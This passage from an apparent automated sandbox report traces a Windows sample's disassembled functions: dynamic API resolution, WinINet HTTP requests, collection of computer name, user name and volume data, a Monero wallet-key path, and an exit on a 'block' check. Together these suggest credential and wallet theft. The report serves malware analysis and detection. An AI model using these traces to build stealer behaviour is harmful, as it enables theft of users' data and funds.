                                    • GetProcAddress.KERNEL32(75900000,015E07F8), ref: 00959995
                                    • GetProcAddress.KERNEL32(75900000,015E0558), ref: 009599AD
                                    • GetProcAddress.KERNEL32(75900000,015D6460), ref: 009599C5
                                    • GetProcAddress.KERNEL32(75900000,015E05A0), ref: 009599DE
                                    • GetProcAddress.KERNEL32(75900000,015E0810), ref: 009599F6
                                    • GetProcAddress.KERNEL32(75900000,015D63C0), ref: 00959A0E
                                    • GetProcAddress.KERNEL32(75900000,015E0840), ref: 00959A27
                                    • GetProcAddress.KERNEL32(75900000,015E08A0), ref: 00959A3F
                                    • GetProcAddress.KERNEL32(75900000,015D6300), ref: 00959A57
                                    • GetProcAddress.KERNEL32(75900000,015E0900), ref: 00959A70
                                    • GetProcAddress.KERNEL32(75900000,015D6640), ref: 00959A88
                                    • LoadLibraryA.KERNEL32(015E0918,?,00956A00), ref: 00959A9A
                                    • LoadLibraryA.KERNEL32(015E0870,?,00956A00), ref: 00959AAB
                                    • LoadLibraryA.KERNEL32(015E08E8,?,00956A00), ref: 00959ABD
                                    • LoadLibraryA.KERNEL32(015E0888,?,00956A00), ref: 00959ACF
                                    • LoadLibraryA.KERNEL32(015E0858,?,00956A00), ref: 00959AE0
                                    • GetProcAddress.KERNEL32(75070000,015E08B8), ref: 00959B02
                                    • GetProcAddress.KERNEL32(75FD0000,015E08D0), ref: 00959B23
                                    • GetProcAddress.KERNEL32(75FD0000,015E8C58), ref: 00959B3B
                                    • GetProcAddress.KERNEL32(75A50000,015E8E80), ref: 00959B5D
                                    • GetProcAddress.KERNEL32(74E50000,015D64C0), ref: 00959B7E
                                    • GetProcAddress.KERNEL32(76E80000,015E8950), ref: 00959B9F
                                    • GetProcAddress.KERNEL32(76E80000,NtQueryInformationProcess), ref: 00959BB6
                                    Strings
                                    • NtQueryInformationProcess, xrefs: 00959BAA
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    • Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: NtQueryInformationProcess
                                    • API String ID: 2238633743-2781105232
                                    • Opcode ID: 6b4639d02e7efe75637739758fa23ce1957a738c93c084bbb72228c489a5f5e1
                                    • Instruction ID: 57dd964ab12eba0eff655d626c4395ef212463096516d82934a5714f9a8abe3a
                                    • Opcode Fuzzy Hash: 6b4639d02e7efe75637739758fa23ce1957a738c93c084bbb72228c489a5f5e1
                                    • Instruction Fuzzy Hash: 2AA12AB95002409FF344EFA8ED88A663BF9F78C701714451BA605D3274DF39A852EB63

                                    Control-flow Graph
                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0094460F
                                    • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0094479C
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 009446B7, 00944770, 009445DD, 0094462D, 009446D8, 00944678, 009445C7, 009446C2, 0094475A, 009445D2, 00944765, 00944638, 0094473F, 0094474F, 00944662, 00944734, 00944657, 009446AC, 009445F3, 009446CD, 00944643, 0094466D, 009445E8, 0094477B, 00944713, 0094471E, 00944622, 00944683, 00944617, 00944729
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeapProtectVirtual
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom. (the same string, repeated once for each xref listed above and joined with '$')
                                    • API String ID: 1542196881-2218711628
                                    • Opcode ID: d94d1ea50ff358b39bed7fe205818cf9b568dd72735541bd2bddcf4d7790b13b
                                    • Instruction ID: 3018641ed45a46739967c185f06b31ff59d9f7598d642dd1c2e9b991cfc2843d
                                    • Opcode Fuzzy Hash: d94d1ea50ff358b39bed7fe205818cf9b568dd72735541bd2bddcf4d7790b13b
                                    • Instruction Fuzzy Hash: C041F7A17C760C7AC63EBBA6885EEDD76767FC2708F51504AAC4852282CEB06901CF61

                                    Control-flow Graph
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00944915
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 0094493A
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00944ABA
                                    • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00960DDB,00000000,?,?,00000000,?,",00000000,?,015EE4D0), ref: 00944DE8
                                    • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00944E04
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00944E18
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00944E49
                                    • InternetCloseHandle.WININET(00000000), ref: 00944EAD
                                    • InternetCloseHandle.WININET(00000000), ref: 00944EC5
                                    • HttpOpenRequestA.WININET(00000000,015EE450,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00944B15
                                      • Part of subcall function 0095A9B0: lstrlen.KERNEL32(?,015E8AB0,?,\Monero\wallet.keys,00960E17), ref: 0095A9C5
                                      • Part of subcall function 0095A9B0: lstrcpy.KERNEL32(00000000), ref: 0095AA04
                                      • Part of subcall function 0095A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0095AA12
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 0095A920: lstrcpy.KERNEL32(00000000,?), ref: 0095A972
                                      • Part of subcall function 0095A920: lstrcat.KERNEL32(00000000), ref: 0095A982
                                    • InternetCloseHandle.WININET(00000000), ref: 00944ECF
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Similarity
                                    • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                                    • String ID: "$"$------$------$------
                                    • API String ID: 460715078-2180234286
                                    • Opcode ID: 2188c472c6a0800d98f088198b39f5957b8d951c42f27d0b27b7cd7707e9049b
                                    • Instruction ID: 7f0bc8720427f376c36ccf9b818fea1e67adb35e90d0ec864da97f06759b0aa2
                                    • Opcode Fuzzy Hash: 2188c472c6a0800d98f088198b39f5957b8d951c42f27d0b27b7cd7707e9049b
                                    • Instruction Fuzzy Hash: 9F12CC71910118AADB15EB91DCA2FEEB778BF94301F504299B60663091EF702F4DCF6A
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957910
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957917
                                    • GetComputerNameA.KERNEL32(?,00000104), ref: 0095792F
                                    Similarity
                                    • API ID: Heap$AllocateComputerNameProcess
                                    • String ID:
                                    • API String ID: 1664310425-0
                                    • Opcode ID: 04809f690976a6db23de034b432f7ec429e9aa61712481fcf4cc50342e270fbc
                                    • Instruction ID: eca10b5dc56846369b0b1b7671aefa477497f0fe6c0102201802226d29876616
                                    • Opcode Fuzzy Hash: 04809f690976a6db23de034b432f7ec429e9aa61712481fcf4cc50342e270fbc
                                    • Instruction Fuzzy Hash: 7C0162B1904204EBD710DF95DD45FAAFBB8F744B51F10421AEA45A3290D77459048BA1
                                    APIs
                                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,009411B7), ref: 00957880
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 00957887
                                    • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0095789F
                                    Similarity
                                    • API ID: Heap$AllocateNameProcessUser
                                    • String ID:
                                    • API String ID: 1296208442-0
                                    • Opcode ID: 7f571a84b06e51c19e3b94301dbd2ce26388f64960f4a4ff0bf3c01556d6bc79
                                    • Instruction ID: b44e4795334006abaa2faa4e972489d3cff8c2a8a09a6f5152677f9ea1ee90d5
                                    • Opcode Fuzzy Hash: 7f571a84b06e51c19e3b94301dbd2ce26388f64960f4a4ff0bf3c01556d6bc79
                                    • Instruction Fuzzy Hash: 9EF04FB1944208ABD710DF99DD49BAEFBB8EB04711F10065AFA05A3690C7785904CBA1
                                    APIs
                                    Similarity
                                    • API ID: ExitInfoProcessSystem
                                    • String ID:
                                    • API String ID: 752954902-0
                                    • Opcode ID: 79a151d0de94ed92838c61edb3dcb89fb5e2821e87872da502bb666854a0f305
                                    • Instruction ID: aaccfff22c23759bdd7f9170c62c9500c626dc4e103d2976bbee8adb6f15240e
                                    • Opcode Fuzzy Hash: 79a151d0de94ed92838c61edb3dcb89fb5e2821e87872da502bb666854a0f305
                                    • Instruction Fuzzy Hash: 3AD05E7890430CDBDB00DFE0D849ADDBB78FB0C311F000556D90563350EE306881CBA6

                                     Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                    APIs
                                    • GetProcAddress.KERNEL32(75900000,015D62E0), ref: 00959C2D
                                    • GetProcAddress.KERNEL32(75900000,015D6540), ref: 00959C45
                                    • GetProcAddress.KERNEL32(75900000,015E8F10), ref: 00959C5E
                                    • GetProcAddress.KERNEL32(75900000,015E8FB8), ref: 00959C76
                                    • GetProcAddress.KERNEL32(75900000,015EC8D0), ref: 00959C8E
                                    • GetProcAddress.KERNEL32(75900000,015ECA20), ref: 00959CA7
                                    • GetProcAddress.KERNEL32(75900000,015DB130), ref: 00959CBF
                                    • GetProcAddress.KERNEL32(75900000,015ECA38), ref: 00959CD7
                                    • GetProcAddress.KERNEL32(75900000,015ECA50), ref: 00959CF0
                                    • GetProcAddress.KERNEL32(75900000,015ECAE0), ref: 00959D08
                                    • GetProcAddress.KERNEL32(75900000,015EC840), ref: 00959D20
                                    • GetProcAddress.KERNEL32(75900000,015D6280), ref: 00959D39
                                    • GetProcAddress.KERNEL32(75900000,015D65A0), ref: 00959D51
                                    • GetProcAddress.KERNEL32(75900000,015D62A0), ref: 00959D69
                                    • GetProcAddress.KERNEL32(75900000,015D6620), ref: 00959D82
                                    • GetProcAddress.KERNEL32(75900000,015EC8A0), ref: 00959D9A
                                    • GetProcAddress.KERNEL32(75900000,015ECA68), ref: 00959DB2
                                    • GetProcAddress.KERNEL32(75900000,015DAF00), ref: 00959DCB
                                    • GetProcAddress.KERNEL32(75900000,015D63A0), ref: 00959DE3
                                    • GetProcAddress.KERNEL32(75900000,015EC810), ref: 00959DFB
                                    • GetProcAddress.KERNEL32(75900000,015EC918), ref: 00959E14
                                    • GetProcAddress.KERNEL32(75900000,015ECA80), ref: 00959E2C
                                    • GetProcAddress.KERNEL32(75900000,015EC870), ref: 00959E44
                                    • GetProcAddress.KERNEL32(75900000,015D65E0), ref: 00959E5D
                                    • GetProcAddress.KERNEL32(75900000,015EC9C0), ref: 00959E75
                                    • GetProcAddress.KERNEL32(75900000,015ECA98), ref: 00959E8D
                                    • GetProcAddress.KERNEL32(75900000,015ECAB0), ref: 00959EA6
                                    • GetProcAddress.KERNEL32(75900000,015ECAC8), ref: 00959EBE
                                    • GetProcAddress.KERNEL32(75900000,015EC858), ref: 00959ED6
                                    • GetProcAddress.KERNEL32(75900000,015EC9D8), ref: 00959EEF
                                    • GetProcAddress.KERNEL32(75900000,015ECAF8), ref: 00959F07
                                    • GetProcAddress.KERNEL32(75900000,015EC8E8), ref: 00959F1F
                                    • GetProcAddress.KERNEL32(75900000,015EC9F0), ref: 00959F38
                                    • GetProcAddress.KERNEL32(75900000,015E9AB8), ref: 00959F50
                                    • GetProcAddress.KERNEL32(75900000,015EC930), ref: 00959F68
                                    • GetProcAddress.KERNEL32(75900000,015EC828), ref: 00959F81
                                    • GetProcAddress.KERNEL32(75900000,015D6420), ref: 00959F99
                                    • GetProcAddress.KERNEL32(75900000,015ECA08), ref: 00959FB1
                                    • GetProcAddress.KERNEL32(75900000,015D6580), ref: 00959FCA
                                    • GetProcAddress.KERNEL32(75900000,015EC888), ref: 00959FE2
                                    • GetProcAddress.KERNEL32(75900000,015EC8B8), ref: 00959FFA
                                    • GetProcAddress.KERNEL32(75900000,015D65C0), ref: 0095A013
                                    • GetProcAddress.KERNEL32(75900000,015D6600), ref: 0095A02B
                                    • LoadLibraryA.KERNEL32(015EC948,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A03D
                                    • LoadLibraryA.KERNEL32(015EC900,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A04E
                                    • LoadLibraryA.KERNEL32(015EC978,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A060
                                    • LoadLibraryA.KERNEL32(015EC960,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A072
                                    • LoadLibraryA.KERNEL32(015EC990,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A083
                                    • LoadLibraryA.KERNEL32(015EC9A8,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A095
                                    • LoadLibraryA.KERNEL32(015ECC48,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A0A7
                                    • LoadLibraryA.KERNEL32(015ECCA8,?,00955CA3,00960AEB,?,?,?,?,?,?,?,?,?,?,00960AEA,00960AE3), ref: 0095A0B8
                                    • GetProcAddress.KERNEL32(75FD0000,015D66C0), ref: 0095A0DA
                                    • GetProcAddress.KERNEL32(75FD0000,015ECC30), ref: 0095A0F2
                                    • GetProcAddress.KERNEL32(75FD0000,015E89D0), ref: 0095A10A
                                    • GetProcAddress.KERNEL32(75FD0000,015ECD20), ref: 0095A123
                                    • GetProcAddress.KERNEL32(75FD0000,015D66A0), ref: 0095A13B
                                    • GetProcAddress.KERNEL32(734B0000,015DB018), ref: 0095A160
                                    • GetProcAddress.KERNEL32(734B0000,015D67C0), ref: 0095A179
                                    • GetProcAddress.KERNEL32(734B0000,015DAFA0), ref: 0095A191
                                    • GetProcAddress.KERNEL32(734B0000,015ECC60), ref: 0095A1A9
                                    • GetProcAddress.KERNEL32(734B0000,015ECB40), ref: 0095A1C2
                                    • GetProcAddress.KERNEL32(734B0000,015D67A0), ref: 0095A1DA
                                    • GetProcAddress.KERNEL32(734B0000,015D68A0), ref: 0095A1F2
                                    • GetProcAddress.KERNEL32(734B0000,015ECBB8), ref: 0095A20B
                                    • GetProcAddress.KERNEL32(763B0000,015D6820), ref: 0095A22C
                                    • GetProcAddress.KERNEL32(763B0000,015D69C0), ref: 0095A244
                                    • GetProcAddress.KERNEL32(763B0000,015ECB70), ref: 0095A25D
                                    • GetProcAddress.KERNEL32(763B0000,015ECB28), ref: 0095A275
                                    • GetProcAddress.KERNEL32(763B0000,015D67E0), ref: 0095A28D
                                    • GetProcAddress.KERNEL32(750F0000,015DB1D0), ref: 0095A2B3
                                    • GetProcAddress.KERNEL32(750F0000,015DAF28), ref: 0095A2CB
                                    • GetProcAddress.KERNEL32(750F0000,015ECC78), ref: 0095A2E3
                                    • GetProcAddress.KERNEL32(750F0000,015D6800), ref: 0095A2FC
                                    • GetProcAddress.KERNEL32(750F0000,015D6840), ref: 0095A314
                                    • GetProcAddress.KERNEL32(750F0000,015DB2E8), ref: 0095A32C
                                    • GetProcAddress.KERNEL32(75A50000,015ECC90), ref: 0095A352
                                    • GetProcAddress.KERNEL32(75A50000,015D6A00), ref: 0095A36A
                                    • GetProcAddress.KERNEL32(75A50000,015E8970), ref: 0095A382
                                    • GetProcAddress.KERNEL32(75A50000,015ECDC8), ref: 0095A39B
                                    • GetProcAddress.KERNEL32(75A50000,015ECBA0), ref: 0095A3B3
                                    • GetProcAddress.KERNEL32(75A50000,015D69A0), ref: 0095A3CB
                                    • GetProcAddress.KERNEL32(75A50000,015D6780), ref: 0095A3E4
                                    • GetProcAddress.KERNEL32(75A50000,015ECB58), ref: 0095A3FC
                                    • GetProcAddress.KERNEL32(75A50000,015ECCF0), ref: 0095A414
                                    • GetProcAddress.KERNEL32(75070000,015D6680), ref: 0095A436
                                    • GetProcAddress.KERNEL32(75070000,015ECD08), ref: 0095A44E
                                    • GetProcAddress.KERNEL32(75070000,015ECBE8), ref: 0095A466
                                    • GetProcAddress.KERNEL32(75070000,015ECBD0), ref: 0095A47F
                                    • GetProcAddress.KERNEL32(75070000,015ECDE0), ref: 0095A497
                                    • GetProcAddress.KERNEL32(74E50000,015D69E0), ref: 0095A4B8
                                    • GetProcAddress.KERNEL32(74E50000,015D6860), ref: 0095A4D1
                                    • GetProcAddress.KERNEL32(75320000,015D6720), ref: 0095A4F2
                                    • GetProcAddress.KERNEL32(75320000,015ECD38), ref: 0095A50A
                                    • GetProcAddress.KERNEL32(6F060000,015D6880), ref: 0095A530
                                    • GetProcAddress.KERNEL32(6F060000,015D6A20), ref: 0095A548
                                    • GetProcAddress.KERNEL32(6F060000,015D68C0), ref: 0095A560
                                    • GetProcAddress.KERNEL32(6F060000,015ECD50), ref: 0095A579
                                    • GetProcAddress.KERNEL32(6F060000,015D6900), ref: 0095A591
                                    • GetProcAddress.KERNEL32(6F060000,015D6940), ref: 0095A5A9
                                    • GetProcAddress.KERNEL32(6F060000,015D68E0), ref: 0095A5C2
                                    • GetProcAddress.KERNEL32(6F060000,015D6920), ref: 0095A5DA
                                    • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 0095A5F1
                                    • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 0095A607
                                    • GetProcAddress.KERNEL32(74E00000,015ECD68), ref: 0095A629
                                    • GetProcAddress.KERNEL32(74E00000,015E8830), ref: 0095A641
                                    • GetProcAddress.KERNEL32(74E00000,015ECD80), ref: 0095A659
                                    • GetProcAddress.KERNEL32(74E00000,015ECC18), ref: 0095A672
                                    • GetProcAddress.KERNEL32(74DF0000,015D6960), ref: 0095A693
                                    • GetProcAddress.KERNEL32(6F9C0000,015ECCC0), ref: 0095A6B4
                                    • GetProcAddress.KERNEL32(6F9C0000,015D66E0), ref: 0095A6CD
                                    • GetProcAddress.KERNEL32(6F9C0000,015ECCD8), ref: 0095A6E5
                                    • GetProcAddress.KERNEL32(6F9C0000,015ECD98), ref: 0095A6FD
                                    Similarity
                                    • API ID: AddressProc$LibraryLoad
                                    • String ID: HttpQueryInfoA$InternetSetOptionA
                                    • API String ID: 2238633743-1775429166
                                    • Opcode ID: 2da797da31c13f9d70fe58d76cb2a495ea72e1d8d2196dcc7a51bfe5bcc14a70
                                    • Instruction ID: 888d936b043641cc8d255587923c4aab54519739aa25517cd1f3854284a96c08
                                    • Opcode Fuzzy Hash: 2da797da31c13f9d70fe58d76cb2a495ea72e1d8d2196dcc7a51bfe5bcc14a70
                                    • Instruction Fuzzy Hash: C5622AB9510200AFF744DFA8ED989663BF9F78C701714851BA609D3274DF39A852EB23

                                     Control-flow Graph (rendered graph not reproduced; legend: Executed / Not Executed)
                                    APIs
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00944839
                                      • Part of subcall function 009447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00944849
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • InternetOpenA.WININET(00960DFE,00000001,00000000,00000000,00000000), ref: 009462E1
                                    • StrCmpCA.SHLWAPI(?,015EE590), ref: 00946303
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00946335
                                    • HttpOpenRequestA.WININET(00000000,GET,?,015ED9E8,00000000,00000000,00400100,00000000), ref: 00946385
                                    • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009463BF
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009463D1
                                    • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 009463FD
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0094646D
                                    • InternetCloseHandle.WININET(00000000), ref: 009464EF
                                    • InternetCloseHandle.WININET(00000000), ref: 009464F9
                                    • InternetCloseHandle.WININET(00000000), ref: 00946503
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
• Associated: 00000000.00000002.2086323229.0000000000940000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086356654.00000000009F1000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086356654.00000000009FD000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086356654.0000000000A22000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086356654.0000000000B8A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086569824.0000000000B9E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086569824.0000000000D20000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086569824.0000000000E01000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086569824.0000000000E23000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086569824.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2086569824.0000000000E3A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089244616.0000000000E3B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089980560.0000000000FD3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2089995871.0000000000FD4000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 3749127164-2509457195
                                    • Opcode ID: 687d44c1d663ad63e71ff3addcf7110deec177a61f7eed1ff1c3c6a860b3a664
                                    • Instruction ID: 48a9702b66d105b72e3e544f2093d9718fb09540526c1b32131fb78e9ea554da
                                    • Opcode Fuzzy Hash: 687d44c1d663ad63e71ff3addcf7110deec177a61f7eed1ff1c3c6a860b3a664
                                    • Instruction Fuzzy Hash: A6714FB1A00218ABEF24DFA0CC55FEE7778BB45701F108159F6096B1E0DBB46A89CF56

                                    Control-flow Graph

(Control-flow graph of the function at 00955510, blocks 00955510-00955AC6; the rendered graph and its executed/not-executed legend are not reproduced here.)
                                    APIs
                                      • Part of subcall function 0095A820: lstrlen.KERNEL32(00944F05,?,?,00944F05,00960DDE), ref: 0095A82B
                                      • Part of subcall function 0095A820: lstrcpy.KERNEL32(00960DDE,00000000), ref: 0095A885
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955644
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 009556A1
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955857
                                      • Part of subcall function 0095A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0095A7E6
                                      • Part of subcall function 009551F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955228
                                      • Part of subcall function 0095A8A0: lstrcpy.KERNEL32(?,00960E17), ref: 0095A905
                                      • Part of subcall function 009552C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955318
                                      • Part of subcall function 009552C0: lstrlen.KERNEL32(00000000), ref: 0095532F
                                      • Part of subcall function 009552C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00955364
                                      • Part of subcall function 009552C0: lstrlen.KERNEL32(00000000), ref: 00955383
                                      • Part of subcall function 009552C0: lstrlen.KERNEL32(00000000), ref: 009553AE
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0095578B
                                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00955940
                                    • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00955A0C
                                    • Sleep.KERNEL32(0000EA60), ref: 00955A1B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpylstrlen$Sleep
                                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                    • API String ID: 507064821-2791005934
                                    • Opcode ID: 15c50421c9447a6edda3b4b231353c861f6500d0ac4895496c8181a29b25e6c4
                                    • Instruction ID: f8166cd76c5418de8e10779bd9510d9b99589c8057b5e4f5075630e23b26de63
                                    • Opcode Fuzzy Hash: 15c50421c9447a6edda3b4b231353c861f6500d0ac4895496c8181a29b25e6c4
                                    • Instruction Fuzzy Hash: 59E130719101049ADB14FBB1DCA6FED733CAFD4301F508629B906671A2EF346A4DCBA6

                                    Control-flow Graph

(Control-flow graph of the function at 009517A0, blocks 009517A0-009519CD; the rendered graph and its executed/not-executed legend are not reproduced here.)
                                    APIs
                                    • StrCmpCA.SHLWAPI(00000000,block), ref: 009517C5
                                    • ExitProcess.KERNEL32 ref: 009517D1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess
                                    • String ID: block
                                    • API String ID: 621844428-2199623458
                                    • Opcode ID: 4444186e071ba878a3bed7cf0a74be96097f86ac1f4f9a218a4506c3bcd32d94
                                    • Instruction ID: d5c21b232e26a42469f79779c93e66a64b851d55da5bed4129d1f72aa22bc051
                                    • Opcode Fuzzy Hash: 4444186e071ba878a3bed7cf0a74be96097f86ac1f4f9a218a4506c3bcd32d94
                                    • Instruction Fuzzy Hash: E151B4B4A00209EFDB04DFA2E9A4BBE77B9BF84305F10454DE90667390D774E949CB62

                                    Control-flow Graph

(Control-flow graph of the function at 00957500, blocks 00957500-0095768E; the rendered graph and its executed/not-executed legend are not reproduced here.)
                                    APIs
                                    • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00957542
                                    • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0095757F
                                    • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00957603
                                    • RtlAllocateHeap.NTDLL(00000000), ref: 0095760A
                                    • wsprintfA.USER32 ref: 00957640
                                      • Part of subcall function 0095A740: lstrcpy.KERNEL32(00960E17,00000000), ref: 0095A788
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2086356654.0000000000941000.00000040.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_940000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                                    • String ID: :$C$\
